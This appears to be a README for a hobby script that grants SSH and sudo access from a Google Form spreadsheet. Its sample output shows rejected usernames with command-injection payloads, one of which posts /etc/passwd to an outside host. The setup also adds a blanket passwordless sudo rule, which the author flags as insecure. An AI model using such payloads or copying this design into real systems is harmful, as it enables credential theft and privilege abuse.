This script manages ssh user and sudo access via... GOOGLE DOCS!
The way this works is simple:
A user logs into their work gmail account. Once logged in, they can see a Google Form, which allows them to input the following three things for themselves:
- full name
- ssh username
- ssh public key
After they submit their form, their information is automatically added to a spreadsheet
Now all we need is a backend service that scrapes and verifies this spreadsheet :-)
An administer can also edit the spreadsheet and toggle some additional "hidden flags" that do things like purge a user from the system.
This is just a proof-of-concept and has security issues. Please don't use it for anything other than for fun.
For production you should use ldap + kerberos. That's the industry standard for managing ssh access.
This project was the result of brainstorming ideas for solving the following problems:
- Allow an authenticated user to self-manage their ssh-keys
- Allow someone with NO shell/linux experience to administer the users in the spreadsheet.
- Easily control access to those engineers
- Be near real-time (less than 5 minutes from update to rollout)
- Zero time from engineers spent rolling out keys
Google Forms/Sheets is actually a good choice for this project. Everyone knows how it works. It has incredible uptime and uses secure endpoints. It also has a well-documented API and allows for a staggering 10 million requests a day for free. That means you can have almost 7000 hosts update every minute using a free api key!
It also has some additional features that are useful for this task: a user can only submit data once. And once submitted, they can edit it at their on leisure. They don't have access to the backend spreadsheet, just their "answer".
The Form allowed a simple way for everyone in the organization to update (read: self-service) their own ssh-key key. It forced authentication and was about as easy to use as it gets.
The backend to Google Forms is actually just a spreadsheet that's easy to read and parse. Write access to the spreadsheet can be "shared" with someone else at the company and they can manage it without needing any linux experience.
You'll need the following things:
- The script in this repo
- The install script.
- A google API user w/ credentials
You'll need to create a form that has the following text boxes. These are case sensitive so please make sure they match exactly. Or you can change the lines in the script to be your custom field.
SSH usernameSSH Public Key
On the document, make sure you check only the following two boxes. Note, in the picture you don't see some of the boxes because the form wasn't made with a business account:
- Require login to view this form
- Automatically collect respondent's <ORGANIZATION username
- Only allow one response per person (requires login)
- Allow responders to edit responses after submitting
Name your document and save the name, you'll use it later on when setting environment variables.
Lastly, you'll want to edit the "answers" spreadsheet. Add a column that says "purge". If you put an x in this field, then the user will automatically be purged from the system even if they update their key.
While logged into your organizational email, you'll need to create an API key and then activate google drive API
- Log into the gmail account that you want to use with this service
- Go to the Google Developer's Console: https://code.google.com/apis/console
- Click on "Credentials" under "APIs & auth"
- Click "Create new Client ID"
That will download your credentials file, which has the necessary information to make API calls out to Google. Download that file and keep it safe.
After that you'll need to authorize the google drive API
- Click on "APIs" under "APIs & auth"
- Search for "Drive API" and click on it
- Click "activate"
This step is important or else you won't be able to see any documents when you make API calls.
Find the Google spreadsheet that's created automatically by your Form. The title of this document is what you'll set the environment variable DOCUMENT_TITLE to on your system.
While you have the document open, share it with the email address that's provided in your credentials file. Again, this step is important! Or else you'll look for documents with the API and won't find any!
You'll see that your backend form is a really simple excel spreadsheet:
If you're running ubuntu you can simply execute the install script:
$ ./install_on_ubuntu
...Create a new file called ```/etc/sudoers.d/usermanager and add the following line:
%sudo ALL=NOPASSWD: ALL
This will allow users to who part of the "sudo" group to sudo without passwords. This isn't strictly necessary but the script automatically adds users to this group.
This script uses the environment variable CREDENTIALS_FILE. This variable must be a full-path to your credentials file that you got back from Google.
The second variable you'll need to set is DOCUMENT_TITLE. This is the the name of the spreadsheet that serves as the "backend" to your Google form. For example SSH Access Request.
Take a deep breath and hold on to you butts. The script should execute without any problems. It will add users if they are specified in the document.
[WARNING] Adding stephen to system
[WARNING] Adding Alice to system
[WARNING] Adding Frank to system
If somebody used a non-safe username, then you'll see errors like this:
[WARNING] Invalid user "; touch /tmp/pwned". Username must contain letters only!
[WARNING] Invalid user "; curl -XPOST http://mydomain.com -d@/etc/passwd". Username must contain letters only!
I want to reiterate again that this was just a fun experiment and not fit for production. I do think there's value to using forms such as this and the API to scrape and do things with data, but not for ssh user access.
There are a few security issues:
- Almost without exception should you never shell-out with user-supplied data.
- There's no granularity. This grants sudo access to everyone who can submit a form
- I did my best to sanitize the user inputs, but I don't trust it. Does anyone know of a better python library for this?